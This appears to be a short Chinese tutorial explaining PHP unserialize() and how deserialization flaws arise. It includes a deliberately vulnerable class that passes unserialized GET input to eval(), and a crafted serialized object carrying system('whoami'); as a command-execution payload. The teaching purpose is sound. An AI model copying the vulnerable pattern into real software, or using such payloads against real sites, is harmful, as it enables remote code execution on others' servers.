一、什么是反序列化?
反序列化是将序列化的字符串还原为PHP的值的过程。
二、如何反序列化
使用unserialize()函数来执行反序列化操作
代码1:
$serializedStr = 'O:8:"stdClass":1:{s:4:"data";s:6:"sample";}';
$originalData = unserialize($serializedStr);
echo $originalData->data;
结果:
sample
三、反序列化漏洞是怎么产生的?
反序列化过程中,unserialize()接收到的值(字符串)可控;
通过更改这个值(字符串),得到所需要的代码,即生成的对象的属性值。
反序列化不改变类的成员方法;需要调用方法后才能触发;
通过调用方法,触发代码执行。
代码2:
<?php
class summer{#定义了一个summer类
public $a = '';
public function displayVar(){
eval($this->a);#执行一个系统指令,将a里边的值定义到eval中
}
}$get = $_GET["spring"];
$b = unserialize($get);$b->displayVar();
?>
1、使用$_GET获取get方法传输的spring参数
2、使用unserialize()函数对传入的值进行反序列化
注:eval()函数在PHP中的功能是将字符串作为PHP代码来执行
3、然后调用displayVar()将传入的参数执行出来。
4、如此可以看见,get传入的值必须是序列化后的值.
5、如何获得序列化后的值呢?
代码3
<?php
class summer{ #定义了一个summer类
public $a ="system('whoami');";
}echo serialize(new summer);
?>
结果:
O:6:"summer":1:{s:1:"a";s:17:"system('whoami');";}
6、查看代码2是通过get方法获取spring参数的值,
如下图构造url,即可执行命令。
